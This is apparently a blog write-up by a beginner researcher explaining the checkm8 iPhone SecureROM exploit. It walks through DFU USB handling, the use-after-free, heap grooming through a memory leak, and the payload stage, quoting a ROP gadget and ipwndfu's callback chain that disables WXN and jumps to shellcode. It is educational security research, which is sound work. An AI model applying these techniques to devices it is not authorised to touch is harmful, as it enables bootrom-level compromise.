About the checkm8 exploit

I will try to explain what I could understand of the checkm8 exploit and reproduce it.

This subject is now kind of outdated as maybe everyone already know how it does work but well I do not, so I thought it would be interesting to give a try!

I am not lying, it just… looked scary, all of this was and is still too much for a beginner in vulnerabilties like me… but today I moving out of my comfort zone and I will try to understand it! (๑•̀ㅂ•́)و✧

At first I didn’t want to publish it since I noticed after finishing the writing this article that some write-up were already existing and were somehow much better than mine (I even thought at first that I copied some, which was not the case ;-;) but after all I’ve done, I had to publish it.

Some things may be wrong as I tried to understand by myself without asking that much help so please correct me if I ever say something wrong, this write-up was really written in order to educate myself so… here it is :’)

I hope that you will learn something new or at least will enjoy what I have been doing for the last few months!

Also, I will assume that you have a bit of knowledges in reverse-engineering, embedded programming, etc.

0x1. Basics

In 2019, @axi0mX published out of nowhere a SecureROM exploit which the vulnerabilty can be used from the iPhone 4S (A5) to the iPhone X (A11) devices.

This kind of exploit is very important as Apple can only fix it by releasing new devices as it is related to the SecureROM (Read Only Memory), which allows us to have the highest privileges possible (EL3).

As said, this exploit is targetting the SecureROM, which is the very first component of the bootchain to start (you can read a bit about the bootchain here).

Here is a quick view of the bootchain process:

The checkm8 exploit occurs then at the very beginning of this sequence: when the DFU mode is triggered, and what I am going to do today is to try to reproduce the exploit on my own!

Also, this is thanks to this exploit that amazing projects could have seen the light such as:

checkra1n jailbreak,
project sandcastle (which allows us to boot Linux/Android!),
Bonobo cables (allowing CPU debugging through JTAG/SWD),
checkm8_bootkit (allowing to boot arbitrary iBoot images),
[…]

And also since then, multiple fork of ipwndfu have seen the light for many other devices or using alternative ways such as:

checkwatch (targetting the Apple Watches)
checkm8-haywire (targetting Apple’s haywire)
ra1npoc (allowing to use checkm8 using an already jailbroken device)
[…]

Anyways, enough talking: let’s see how it works! (^∀^)

0x2. Apollo

Some few times after the release of checkm8, @littlelailo published a gist about an Apple BootROM bug which appeared to be the same bug as checkm8.

The interesting thing there is that there is only a few exploitation explaination without that much details and no big lines of code (nor tool) provided, making that gist a great training for today: I will try to understand the bug only by following this kind of guide.

Let’s get into it :)

0x21. Step 1 (Starting)

1: “When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output”

DFU is a mode where you should be allowed to restore your device from any state (and is also a part of the SecureROM).

From what I understood, when you enter in DFU mode, a certain function called usb_init_with_controller(...) is called to init the USB Stack so it can communicate with a host in order to receive an image and exit this “emergency” state.

In this context, the function usb_core_init(…) is being invoked, which is the one indirectly referenced in the previous statement.

Globally, this function has for purpose to register a new DFU interface that will perform all of the required state management and communications with the connected host in the hope to receive a new firmware.

The buffer mentioned here is a global variable from the Interface Code called io_buffer, which is allocated by the memalign(3) function. Its purpose is to temporarily store the received data.

Then, the function will continue its process by registering an interface (which is the communication way between the device and the computer) that will handle all USB transfers/transactions/[…] thanks to a structure called usb_interface_instance (which is also a global structure):

The pseudo-code you are currently viewing was taken from an A7 SecureROM, you can pick it up here (but I mostly used the iBoot source code)

Once this function has been successfully executed, the process continues until completion, and the device is officially placed in the DFU state, allowing us to proceed to the next step.

Please keep in mind the usb_interface_instance structure fields, it will be useful and explained later.

0x22. Step 2 (USB)

2: “if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code”

For this step, please take a deep sit because this is going to be a long one.

Because this part will actually treat about the USB basics and some other things related to the Interface / Main code.

0x221. Basics

Actually, I had like no knowledge at all about all of this USB stuff and all, that’s why I will try to detail what I understood (please correct me if I’m wrong).

One thing you need to know is that the DFU mode accepts something called “control transfers”: these “transfers” are typically initiated by the host to perform various operations on the device and are working in “phases” (you can read more if you really want a more complete explaination here):

The host is the device that initiates and controls the communication, in short: that’s us

Technically, every USB devices must have a sort of “default configuration” in order to answer when a SETUP packet is sent.

Also, a packet usually (no matter which phase it actually is) looks like this:

These are the main fields, a plenty of other libraries can deal with the control transfers (and has differents prototypes) but you got the idea

bmRequestType: indicates the direction of the request (if it’s a request from the device to the host or the opposite),
bRequest: this actually indicates what kind of control request we’ve sent but will mostly depends on the bmRequestType field (I will talk about it later),
wValue: specifies the information that needs to be passed from host to device, such as the ability to set/get the USB descriptor or configuring device features (for example),
wIndex: similar as wValue except that this is with this field you can pass the endpoint or interface number (as we are working with descriptors),
Data: it’s a buffer that contains the data of the control request (input or output depends on the specific request and its direction),
wLength: should match the size of the Data field and indicates how much data is being transferred from the host to the device or the opposite.

0x222. Endpoints

If you read what I’ve wrote carefully, you may have noticed something called the “endpoint”:

From what I understood, the endpoint is a specific address within a USB device where data is sent/received. It can hold a buffer but also defines the type of data and transfer specificities (control, bulk, interrupt or isochronous) that can be transferred using it.

Every devices should have an “endpoint at the address 0x0” (also known as EP0).

The EP0 purpose is that you can send AND receive data within a single transfer, but also (and more importantly) to be reserved for every control transfers which gives to the host the ability to read the device descriptor tables (corresponding to the setup part previously done in order to enter in DFU mode) and to send control commands to the device during normal application execution.
For example, EP0 is used to indicate the end of a packet transfer, which is important for the proper functioning of USB communication protocol processes.

Phew, that was something… and we’re absolutely not done yet ٭(•﹏•)٭

0x223. Standard Interface Requests

As you saw previously, there’s a field called bmRequestType and another called bRequest and these are vitals in a control transfer.

I was looking at the iBoot source code and I found a comment that I found interesting about that:

And so, here we go: welcome to Yui’s class, please take a sit:

The content that you’re about to see is called the Standard Interface Requests, they are name-specific to the DFU interface but are basically used to configure and control the behavior of the current interface within the USB device (here the DFU).

Actually, there are two types of bmRequestType (and plenty of bRequest for each of them):

DEVICE2HOST (its value is 0xA1) and its available bRequest are:
- DFU_GETSTATUS (0x3): allow the host (that’s us) to get the device’s status,
- DFU_GETSTATE (0x5): same as the status except that instead of the status, we’re getting the device’s current state.

HOST2DEVICE (its value is 0x21) and its available bRequest are:
- DFU_DNLOAD (0x1): allow data transfers from the host (that’s still us) to the device,
- DFU_CLR_STATUS (0x4): clear the status and exits the DFU mode,
- DFU_ABORT (0x6): same as DFU_CLR_STATUS.

The DFU_CLR_STATUS and DFU_ABORT requests are the same, even though the names are different.

0x224. Standard Device Requests

In addition to the requests mentioned earlier, there’s also something called Standard Device Requests which are essentials for device enumeration/configuration/… and any other control transfers that apply to the entire device: they are essentials for the device overall functionality and provide a standard way for the host and device to communicate/configure the device.

So, there are, again, two types of bmRequestType (and still plenty of bRequest):

DEVICE2HOST (its value is 0x80) and its available bRequest are:
- USB_REQ_GET_STATUS (0x0): allows us to get the status of the device,
- USB_REQ_GET_DESCRIPTOR (0x6): allows us to request a descriptor that can provide information (such as the device configuration, interfaces, endpoints, …),
- USB_REQ_GET_CONFIGURATION (0x8): allows us to get the current device configuration (how the device operates, which interfaces are active, …),
- USB_REQ_GET_INTERFACE (0xA): allows us to get the current interface setting (such as: which alternate setting is active, …).

HOST2DEVICE (its value is 0x00) and its available bRequest are:
- USB_REQ_CLEAR_FEATURE (0x1): allows us to clear a specific feature of the device,
- USB_REQ_SET_FEATURE (0x3): allows us to set a specific feature of the device,
- USB_REQ_SET_ADDRESS (0x5): allows us to set the USB address of the device (after, the communication between the device and the host will be established using this address)
- USB_REQ_SET_CONFIGURATION (0x9): allows us to set the device configuration,
- USB_REQ_SET_INTERFACE (0xB): allows us to set the device interface.

Note that the HOST2DEVICE bRequest are not that much explained since they’re pretty much already explained in the DEVICE2HOST bRequest.

Well, whether it’s configuring or managing the device, both Standard Interface Requests and Standard Device Requests own different roles which in the end eases the communication/control/… between the device and the host (I thought it was important to mention this since many USB requests use these parameters, though I agree it can be a bit confusing-).

So now, you can also guess that when we are talking about the main code, we are in fact talking about the USB Core and when we are talking about the interface code, we’re talking about the DFU’s USB part, this will really be useful for the next part.

We should be alright now, this was huge and complex but we made it, let’s move foreward! (disclaimer: this is not the end-)

0x225. Packet Handling

ANYWAYS.

In this step, it’s mentioned that the packet is first handled by the main code so we’ll look forward to this.

I will not lie, my first researche were false because I looked at the Interface Code and not the Main Code (which was correct in the end but not entierly, I really was confused by everything, I must confess), but now that we’ve seen how to differenciate them, we can now make things right!

So! in order to find the function that actually handles the packet, you have to dig pretty deep into the code (so I will not detail how far I searched but) the one I found is called usb_core_handle_usb_control_receive(...).

It seems that this function is the one that handles the SETUP packets (and will call another function called handle_ep0_data_phase(...) if the packet received is a DATA one), so the following pseudo-code is the one that will be executed when a SETUP packet is received:

The usb_dfu_interface_instance structure is the one we’ve talked about earlier (it contains the elements when the DFU interface was registered, […]).

From what I understand, if the bmRequestType is correctly set and if the bRequest is a USB_REQ_HOST2DEVICE one, then the function will call a member of usb_dfu_interface_instance: this member is a function pointer pointing to the handle_interface_request(...), which is an interface function (this is where we will jump from the main code to the interface code).

This point is leading us to the next part.

Also, if you’ve read carefully then you saw that once the usb_core_handle_usb_control_receive(...) function is done, it will jump to a label called success which will only tell that the DATA Phase can be started, not that much interesting to show.

0x23. Step 3, 4, 5 (Update)

3, 4, 5: “the interface code verifies that wLength is shorter than the input output buffer length and if that’s the case it updates a pointer passed as an argument with a pointer to the input output buffer”

When the main code jumps to this interface function, the first thing I’ve noticed was that this function handled the two interface bmRequestType available and all of their bRequest.

However, in our case we are only interested in the HOST2DEVICE request, in particulary the DFU_DNLOAD bRequest (which is the one that allows us to send data to the device, if you followed until there then I don’t think I need to explain why).

As the statement says, when the function enter in the condition where the bRequest is equal to DFU_DNLOAD, it will check if wLength is shorter than the io_buffer total allocated length (which is 0x800).

However, the pseudo-code is showing the case where wLength is bigger than the io_buffer length which will make DFU stalling (the logic is still the same though).

That aside, the main point of this function is to update the ep0_data_phase_buffer pointer to take the address of the io_buffer, which is the buffer of the interface code that will be used for the DATA Phase and that contains allocated memory for the data received (see usb_dfu_init(...)).

The function will then returns wLength and will jump back to the main code (a.k.a usb_core_handle_usb_control_receive(...)).

We can now move on to the next part!

0x24. Step 6 (Buffer Filling)

6: “if a data package is recieved it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were received already”

Then, here comes the DATA Phase, which is handled by the function handle_ep0_data_phase(...) (which is called by the function usb_core_handle_usb_control_receive(...)… again… phew~).

This function was a mess to disassemble, it was complicated to figuring out what’s going on, just see by yourself…

Globally, this pseudo-code is already speaking from itself, but as it is pretty messy all those comments, I will try to explain it in a more understandable way:

First, it will checks if adding the received data (ep0_data_phase_rcvd) to the previously received data (ep0_data_phase_rcvd) exceeds the expected data phase length (ep0_data_phase_length).

If it does, the code stalls the EP0_IN endpoint (this endpoint is used for sending data from the USB Device to the host) and then clear the global variables.

Second, it will uses the memcpy(...) function to copy the content from rx_buffer to the ep0_data_phase_buffer (which will be then updated to point to the next available position in the buffer, etc.). and state that the DATA Phase is still in progress.

Just a quick reminder to tell that rx_buffer has the io_buffer address

Finally, if either the entire expected data has been received or the received data doesn’t fill up a full packet (if we sent 0x26 out of 0x40 bytes for example), it will complete the data phase by checking up if there is a non-null callback function registered from the interface (which should be a function called data_received(...)).

If there is, then it will call and jump to this function, which is the one we will talk about in the next part.

0x25. Step 7 (Copy Buffer To Insecure Memory)

7: “if all the data was received the dfu specific code is called again and that then goes on to copy the contents of the input output buffer to the memory location from where the image is later booted”

We just talked a non-null callback function called data_received(...) (which is called when the expected data has been received).

I will not detail everything but there is an interesting part in this screenshot: the security_allow_memory(...) function.

  
if (!(security_allow_memory(usb_dfu_interface_instance[...] + total_received, received) & 1))

This function is the one that will copy the content of the io_buffer to the memory location said by the statement (called the INSECURE_MEMORY) from where the firmware (IMG4) is later booted as DFU is supposed waiting for an image (so you can easily guess that it is a very sensitive zone).

If everything went well then it will jump back to the handle_ep0_data_phase(...) function, send a Zero-Length Packet and finally resetting the global variables such as ep0_data_phase_length, ep0_data_phase_buffer etc. (these are global state variables that are used to keep track of the DATA Phase).

Also, sending a ZLP packet is mandatory as it “prevent” issues that could arise due to incomplete or unsynchronized data transfers.

0x26. Step 8, 9 (Done)

8, 9: if dfu exits the input output buffer is freed and if parsing of the image fails bootrom reenters dfu

All you’ve see from now was originally executed from this function: getDFUImage(...): this is the one that is responsible for calling the right functions that will handle the DFU image awaiting and the USB initialization/ending of the DFU mode.

Only if the USB initialization is successful, the DFU mode will wait for the dfu_done variable to be set to true (which is the case in the data_received() function or by sending a DFU_ABORT/DFU_CLR_STATUS packet or by sending an USB Reset), making it stop.

At this point of the explaination, we’ve reached the end of this function (assuming we’ve sent data so the io_buffer isn’t empty).

A function called usb_quiesce() will call several functions that will stop the USB tasks, reset the USB controllers/descriptors, etc. in summary: it will shutdown the USB Stack.

Keep in mind that among these shutdowns, the EP0_IN/EP0_OUT endpoints will also be aborted and stopped (thanks to a function called synopsys_otg_stop(void)).

One of these functions is called usb_dfu_exit(void) and this is the one that is responsible for resetting the interface which handled all commands (thanks to the bzero() function) and, if the io_buffer is not empty, freeing then NULLing it (because it don’t have any use any more, we wouldn’t want an Use-After-Free… right? :)).

The pseudo-code is slightly messed up since the beginning but I tried to make it as readable as possible using the iBoot source code

Then, it will jump back to the getDFUImage(...) function and, depending on the return value (called completion_status), the DFU will either be restarted/reentered, either be booted later (which is slightly out of context from this point).

We are now DONE with the explaination part, that was hard but well done for still being there!! (ﾉ◕ヮ◕)ﾉ*:･ﾟ

0x27. Summary

I admit, this is TOO MUCH informations to process at once, so I will try to summarize everything we’ve seen so far.

About the global process of the DFU mode, here’s a very abridged draw of what we’ve seen:

I know that this is not an accurate draw, but as the tittle says: it’s just a summary :)

And of course, I made another abridged draw of the differents requests we’ve seen:

Not that my memory is kind of limited but I really don’t always remember everything so I made this draw to help me remember the requests names and values

However, in all of this process, a certain vulnerability is occuring, and this is what we will see in the next part.

0x3. Exploitation

And so, here we are: the exploitation part.

I was wondering “how in the world is it even possible to find a vulnerability in all of this complex algorithm??” and to be really honest: I wouldn’t have been able to find it by myself.

0x31. Use-After-Free

As @littlelailo said:

At step 5 the global variables are updated and the bootrom gets ready to recieve 
the data, but with a cheap controller you can violate the usb spec and don't
send any (arduino host controller or sth like that).

Then you can trigger a usb reset to trigger image parsing. If that parsing fails
bootrom will enter dfu once again, BUT step 8 (code resets all variables and
goes on to handel new packages) wasn't executed so the global variables still
contain all the values.

However step 9 (when input output buffer is freed) was executed
so the input output buffer is freed while the pointer which was passed as an
argument in step 3 still points to it.

Because of that you can easily trigger a write to an already freed buffer by
sending data to the device.

What this text is saying is that in this whole logic, an Use-After-Free is occuring.

Why? Because the io_buffer is freed but the pointer that points to it (ep0_data_phase_buffer, do you remember?) is still valid.

Based on the summary draw I’ve made earlier, here’s what’s supposed happening:

This may be a little bit confusing, but this is summaring what @littlelailo said.

In another terms:

Get into the DATA phase / to the point where the global variables are updated,
From there, we can send a DFU_ABORT/DFU_CLR_STATUS nor an usb_reset request (which will set the dfuDone variable to true, stopping all DFU activities),
The usb_quiesce(...) function (we previously saw) will free the io_buffer and shutdown the USB Stack BUT the global variables (from the handle_ep0_data_phase(...) function) will not be clear as the transfer will not be complete,
Then the getDFUImage(...) function we previously saw will be re-executed but the global variables will not be reinitialized, making the ep0_data_phase_buffer still pointing to the previous io_buffer address, which is now freed.

ep0_data_phase_buffer = NULL: by NULLing the pointer, we are telling that we will not reuse the actual io_buffer pointer anymore and this is the right thing to do in order to prevent “undefined behaviors”…

however, as we skipped the “variables resetting” part, the pointer is still pointing to the previous io_buffer memory location and, as we are dealing with a ROM (highly (but not fully) predictable so), there’s high chances that the buffer’s address will be the same for each new DFU iterations, which is what we don’t want since it would not be an UaF anymore.

This is amazing, but apparently not enough to exploit the vulnerability…（；へ：）

0x32. Memory Leak

But then, how could we exploit this vulnerability without the io_buffer having the same address?

Well, we then would need a work-around in order to prevent this to happen, and luckily, there’s apparently a way to do so: a Memory Leak (!!!) that will hopefully allow us to control the heap in order to finally allocate the io_buffer further away from the former one’s address.

A Memory Leak occurs when a program allocates memory from the heap but fails to free it back, leading to data remaining allocated but not accessible.

This part will probably be the most complicated one, so please take a deep sit and let’s get into it!

I will not lie, I was kind of stuck there and at this same time, until I saw on Twitter some slides made by @qwertyoruiopz, which was very useful and which I really recommand to take a look at!

So I read it and I found the part that interested me:

In-flight USB transfers will have an associated structure allocated on the heap,

We have the ability to repeatedly malloc and delay the free temporarily,
until the IN endpoint of the device-to-host stall conditions are cleared
or the USB stack is shut down,

A state machine bug in the USB stack is abused in order to have allocations
that persist across USB stack destruction and creation.

(Memory Leak!!!)

SO, I will detail each points in order to understand what’s going on.

I had to search for that “associated structure” and I found one called usb_device_io_request and defined as the following:

  
struct usb_device_io_request
{
    u_int32_t                       endpoint;
    volatile u_int8_t               *io_buffer;
    int                             status;
    u_int32_t                       io_length;
    u_int32_t                       return_count;
    void (*callback)                (struct usb_device_io_request *io_request);
    struct usb_device_io_request    *next;
};

This structure can handle asynchronous operations thanks to the callback field (which is a function pointer that will be called once the request is completed), and the next field (which is a pointer to the next io_request structure in the linked list of requests, allowing a queue).

It is mentioned that stalling (or halting) the DEVICE2HOST is involved in this process, so I had to search for that.

The fact is that when you stall/halt the IN endpoint, you can actually send requests but they will not be executed right away; instead, they will be queued in the linked list until the IN endpoint is unstalled while allocating space for each request in the heap.

However, when the IN endpoint is unstalled, all of these requests will be freed and de-allocated… so, isn’t this giving us the ability to allocate as much as we want and delay all free(...) of the objects on the heap-? (spoiler: YES!)

We somehow have a great vector of attack but sadly slightly superficial, because all of those allocations will not remain through a shut down of the USB Stack… that’s when the Memory-Leak enters!!

Finally, the “abused state machine bug in the USB stack” is foundable right in the callback of the usb_device_io_request:

What this function is basically doing is that a ZLP packet will be added to the execution queue only if the request is a Standard Device Request, has a wLength that is more than 0x0 plus is an exact multiple of 0x40 (corresponding to the EP0_MAX_PACKET_SIZE) and finally if the host has requested more bytes than the current wLength global variable (completing the STATUS phase we have seen at the beginning… phew-).

As I previously said earlier, the usb_quiesce(...) function will shutdown the USB Stack and the endpoints will be aborted then stopped (based on the synopsys_otg_abort_endpoint() function).
In this process, it appears that the remaining pending requests will be processed as aborted, which will trigger the callback of each of them (based on the usb_core_complete_endpoint_io() function).

Based on the slides, we saw that once a request is complete for packets that are meeting the conditions we’ve seen earlier, a ZLP packet should be sent, but in this situation, it will not be sent, leading to a Memory Leak (because the ZLP packet will be queued but never sent).

If you combine up all of these informations, you can easily guess that we have a great vector of attack: stalling the IN endpoint to stack up every requests we need and then trigger a USB Reset to trigger the callback of each of them, which will queue additional ZLP packets that will be leaked.

0x33. Overview

I talked a lot from now, but we should have a pretty good vector of attack and clear view about what we have to do in order to achieve a full exploit at this point!

This is a really quick overview of the exploitation process, I didn’t detailed the Use-After-Free part since it was already explained earlier

In other very brief words, we will have to:

re-shape the heap in order to move the io_buffer further away from the former one’s address on the next DFU iteration using the Memory Leak, creating a hole where the buffer should be placed in: this is the Heap Grooming,
trigger the Use-After-Free vulnerability so the global variables will not be reinitialized and, as the next io_buffer will be placed further away from the former one’s address, we could then write to the former address (the one of the freed buffer),
finally, we will have to a payload that would first overwrite the callback and next fields of the usb_device_io_request structure and then point to the patches, allowing us to achieve code execution.

However, there’s still a last issue: the USB limitations.

Because from what I understood, we have to “abuse” of the usual USB transfers specifications if we want to trigger the UaF with the “incomplete DATA phase” (because yes, that type of behavior would basically not be allowed in the first place), and there’d be two ways:

the one used by @littlelailo: which consists of the usage a “cheap controller” (such as an Arduino or a Raspberry Pi for example) that would allow us to to completely control the USB Stack and send packets that would not be normally allowed (such as partiel control transfers so, etc.),
the one used by @axi0mx: which consists of not using any external controller but instead, abusing of the USB Stack (of the host OS) allowing interrupted transfers (but I will talk about this later).

The most used one is the second one as not everyone can afford such controllers, so I will stick to that one too (that’s the main reason of why I did not follow @littlelailo’s exploitation advices anymore).

0x34. Heap Grooming

This is the first part of the exploitation: the one that will allow us to prepare everything in order to move the io_buffer further away from its address on the next DFU iteration using the Memory Leak (pretty much the most important one in my opinion).

In order to do so, we have to use a technique not that unknown when dealing with an Use-After-Free vulnerability are involved: the Heap Grooming.

This part will then be used for “tweaking” (either re-shape or fulfill) the heap, allowing us to control exactly the flow and be sure of the location of the data we’re about to place in.

We actually need this part here in order to access to the freed io_buffer from the previous iteration of DFU and thus, by creating a hole where the new io_buffer would be allocated in (malloc() would then allocate the io_buffer in the hole we’ve created since it would likely be more “efficient”).

The Heap is a region of memory used for dynamic memory allocation (for objects like io_buffer for example), you can see it as a small box: similar to how you can place/remove items in and out of a box, there, you can allocate/deallocate memory dynamically, allowing you to manage and use memory as needed during the execution.

If you need more concrete examples, you can check out this article or this video to learn more about this technique.

So, how could we then get to our desired point in there?

On the paper and based on what we’ve seen earlier, we have to:

Stall the IN endpoint of the DEVICE2HOST request,
Send multiple requests that will be queued in the linked list of requests,
Making sure that the two extremities (first and last) of the sent requests are good enough to send a ZLP,
Trigger an usb_reset() so all of these requests will be leaked.

Eventually, before triggering the usb_reset(), a last request (which does not meet the requierements to send a ZLP packet) will be sent in order to update the wLength global variable.

Why? Because each times a request is sent, the wLength global variable will be updated to the length of the incoming request.

However, one of the conditions to send a ZLP packet is that the wLength global variable is bigger than the length of the request sent, which would not be the case if the last request we would send would be one that would meet the requierements to send a ZLP packet.

That’s why, in order to prevent that, we have to send a request that will not meet the requierements while having a bigger size than the last request sent to send a ZLP packet.

For example, if we would send 0x81 as a last packet, the wLength global variable would be updated to this value, so in the next DFU iteration, every leaked packet that has for value 0x80 (these values are used as example) would be sent (as 0x80 < 0x81).

So with an abridged draw, here’s how the heap would be shaped before and after:

Note that the first Leaked Packet being the Stalled IN endpoint is because it is actually possible to stall and leak at the same time, which is what we want here (c.f ipwndfu).

However, this is not really how it would look like for some older devices such as the A7/A6/… ones as “the leak is always triggered for all inflight usb requests” (as @qwertyoruiop said).

So instead, the Heap Grooming would become a Heap Spraying, and would look like this:

The Heap Spraying consists of filling the heap with a lot of objects until a certain point, where the Heap Grooming consists of re-shaping the heap (both aims to control the heap in order to place data where we want).

0x35. Use-After-Free (Trigger)

Once the Heap Grooming has been executed, the new io_buffer should be allocated somewhere else than its usual address, allowing us to now trigger the Use-After-Free in order to write to the freed io_buffer address from the previous iteration of DFU.

Based on the everything we’ve seen since the beginning, here’s what we would have to do:

Send a SETUP packet handled by the Interface code (because we will send a DFU_DNLOAD (0x1) request) with a wLength that is smaller than/equal to the io_buffer length (which is 0x800),
Begin the DATA phase but cancelling it mid-way (so the global variables will not be cleared),
Send a DFU_ABORT (0x6) request, freeing the io_buffer and making DFU re-enters.

One of the points which never got any mention of in this post is the usage of an asynchronous transfer.

We indeed have to send an asynchronous (or non-blocking) transfer with a pretty short timeout, as these transfers are more likely to be interrupted (which is what we need here in order to leave the DATA phase incomplete), where synchronous (like libusb_control_transfer(...) for example) transfers are not.

It’s only when we successfully exited the DATA phase that we can send the DFU_ABORT request in order to shutdown the USB Stack and re-enter in DFU mode with the UaF triggered.

The usage of a short timeout is important because if the operation doesn’t complete within the defined time, the transfer becomes interrupted and moves on to the next part, leaving the DATA phase incomplete.

At this point of the exploitation, the io_buffer from the new iteration should have been allocated in the hole we’ve created thanks to the Heap Grooming, and the global variables have the values we wanted!

Starting from this moment, each time we will send data to the device, it will be written to the old io_buffer address, allowing us to write to the freed buffer, we can now insert a payload in order to try to gain code execution!!

I will dedicate a whole GitHub repo for this exploit with comments for every parts of the exploit.

0x36. Payload

This part is in fact composed of two sub-parts: the overwrite and the actual payload itself (I must confess: I peeked at ipwndfu for this part).

The overwrite part is containing enough data to overwrite the callback and next fields from a usb_device_io_request structure objects which will redirect the current execution flow to the payload.
And the payload is an ARM64 Assembly code that will “simply” apply some patches (patch the USB String of the device to PWNED:[checkm8], apply signature checks patches, etc.).

0x361. Overwrite

If you remember well, in the part that would trigger the Memory Leak, I said this:

In this process, it appears that the remaining pending requests will
be processed as aborted, which will trigger the callback of each of them
(based on the usb_core_complete_endpoint_io() function).

Once this function would be executed, each pending request would have their callback being called and, I did not mention it but the usb_device_io_request object (the request itself) would be freed and NULLed.

But, the fact that the object would be freed and NULLed is not a good thing because as we would have overwritten the data in the heap, freeing the request would likely leads to an invalid heap metadata, leading as well to a potential panic.

Luckily, this function “only” calls the callback then frees and NULL the object, so with some techniques, we could “skip” the freeing part.
This could actually be achieved by restoring the Link Register to the address of the usb_core_complete_endpoint_io(...) function.

The Link Register (also known as LR) is a register (x30 in arm64) that is used to store the next address that should be jump back to after returning from a function (it then, changes every time a function is called).

And, restoring a register means that we will give back the address/value of a previously saved register (in this case, the address of the usb_core_complete_endpoint_io(...) function would be stored in the LR register instead of the next instruction address).

Using this technique, we could then restore the LR register to the address of the usb_core_complete_endpoint_io(...) function when the callback would be returned, allowing us to skip/avoid/prevent the request from being freed, avoiding the heap corruption and so making the device panicking.

note that we also need to restore the FP (Frame Pointer) register in order to keep a proper valid Stack Frame and avoid a potential Stack Corruption.

A7/A6/… doesn’t require to restore the LR/FP registers to the usb_core_complete_endpoint_io(...) function as the exploitation method is different (as said earlier, we used a Heap Spraying), so I believe that the heap is not corrupted as the Heap Grooming would do.

Instead, the fields will be overwritten as a “typical” exploitation method (meaning that the the fields will be overwritten only with some random data in order to reach our fields + the payload address that next will point to).

For every other platforms, the previous explaination will be applied using a ROP gadget:

  
__asm__ __volatile__(
    "ldp x29, x30, [sp, #0x10]\n" // loads/restores the values of x29 and x30 from the SP
    "ldp x20, x19, [sp], #0x20\n" // loads the values of x20 and x19 from the SP (also increments the SP by `0x20` bytes for alignment)
    "ret" // jumping back to the address stored in LR (now `usb_core_complete_endpoint_io(...)` function)
);

Technically, this gadget in itself doesn’t do any major operations, but does enough to achieve the goal of skipping the freeing part of the request!

Inside the overwrite should be included the payload address (also called LOAD_ADDRESS in some projects configuration).

This address is corresponding to the INSECURE_MEMORY_BASE, which is, as I said earlier, the memory location from where the firmware (IMG4 etc.) is later booted, but instead of placing an image, the payload will be placed there.

The address of the INSECURE_MEMORY_BASE for each platform can either be found in the iBoot source code (in memmap.h include files) or by reversing the SecureROM and searching for the platform_mmu_setup(...) function.

Be aware that not every platform are setting up the INSECURE_MEMORY_BASE address in this function (this screen shows it for the t8010 (A10) but for example, s5l8960 (A7) does not have it).

At this point, the overwrite part should be done so the payload should be sent and an USB reset should be trigger as well, processing every cancelled requests remaining in the queue and calling their callback as well (which is what we just seen).

0x362. Payload

Our payload should now be loaded at the INSECURE_MEMORY_BASE address, however for some devices, the execution flow is pointing up on a “callback-chain”, but what is it exactly?

From what I understood, this chain is somehow playing a major role as it sets up a required environment for the exploit to succeed by disabling security features, managing the processor state, memory mappings, and more.

Here’s an example of a callback-chain for the t8010 (A10) platform from ipwndfu:

  
t8010_callbacks = [
    (t8010_dc_civac, 0x1800B0600), # clearing the virtual cache
    (t8010_dmb, 0), # data memory barrier used to ensure that all memory accesses are completed before the next instruction is executed
    (t8010_enter_critical_section, 0),
    (t8010_write_ttbr0, 0x1800B0000), # 0x1800B0000 being the INSECURE_MEMORY_BASE, this will redirect the translation table base register to the shellcode
    (t8010_tlbi, 0), # invalidating the TLB (which is cache storing recent translations of virtual memory to physical memory), ensuring that the new translation table base register is used
    (0x1820B0610, 0), # appears to be the WXN disable function
    (t8010_write_ttbr0, 0x1800A0000), # restoring the translation table base register as the data in the INSECURE_MEMORY_BASE will be overwritten
    (t8010_tlbi, 0), # invalidating the TLB again
    (t8010_exit_critical_section, 0),
    (0x1800B0000, 0), # redirect to shellcode
]

Here, the biggest purpose was to disable WXN (Write XOR Execute Never, which prevents the execution of code from a writable memory region) and redirect the execution flow to the shellcode, so the shellcode could be executed without any issues.

The callback-chain is not for every devices, it’s only required for A10 and above devices, others will directly jump to the payload address.

Finally, the shellcode from ipwndfu is an ARM64 Assembly code that will apply some patches to the device.

I won’t detail every lines but rather explain some parts of it in the order:

Restoring the USB Descriptors as we damaged them in the heap grooming part,
Overwriting the USB Serial Number by PWNED:[checkm8],
Overwriting the USB request handler used for the next point,
Handling USB requests and executing custom commands when the device will receive a new request, the new handler (of the 3rd point) will check if the request’s wValue is equal to 0xffff, allowing to execute commands such as memcpy, memset, and exec. In the opposite case, the request will be handled by the default handler.

The shellcode is the part that will apply the patches to the device, you can also add your own patches to it if you want to, keep in mind that ipwndfu’s shellcode is a just the bare minimum.

Afterwards, your device should be placed in pwnedDFU mode and you should be able to play with it as much as you want, closing also this whole article. I hope you’ve learned something from it and that you enjoyed reading it!!

A project summarizing all of this will be made, so this post will be updated as well with a link to it (probably targetting A7 devices as this is the only device I own) :)

0x4. Conclusion

This exploit is really complex (I for sure did not cover every details but most the explaination is here at least) and I realized by the end of this article that I might have picked a really strong subject for my first exploitation post (clown_face.png).

The Use-After-Free vulnerability is a pretty common one, but the exploitation was kind of hard to understand (and to write), but so was the Memory Leak (which was probably the most complex one here-) because the whole logic is really complex and above all, I did a mistake by thinking I could understand the exploit without having the basics of exploitation: I was STUPID and WRONG.

That’s why, in order to understand what’s going on (why such thing is doing that and what is that thing and […]), I had to learn somehow pretty quickly the fundamentals of the art of exploitation (what is/how to use ROP attacks and why, how is a stack/heap truly working, how to achieve Stack/Buffer/Heap Overflows, how to rightfully use GDB/LLDB and know the purpose of registers in runtime, how does malloc()/free() are deeply working, …).

I certainly did not cover every details of the exploit (in particular the most technical ones), but I tried to make it as understandable as possible (and I hope I did it well-).

Anyways, this exploit was a really good example of “real-life vulnerabilties”: it asked for carefulness, patience, a stack of exploitation techniques + a stack of development and a lot of researches… but in the end, if you managed to follow until there, you should have ganined few more knowledges!!

Once again, if I ever said something wrong, please correct me!!

You can follow me on my twitter if you liked this post and you can also support me by looking at my projects on GitHub!

Thank you for your time. ヾ(・ω・*)

0x5. Links

littlelailo’s Gist

qwertyoruiop’s Slides

tihmstar’s PR (interesting)

USB Packets Documentation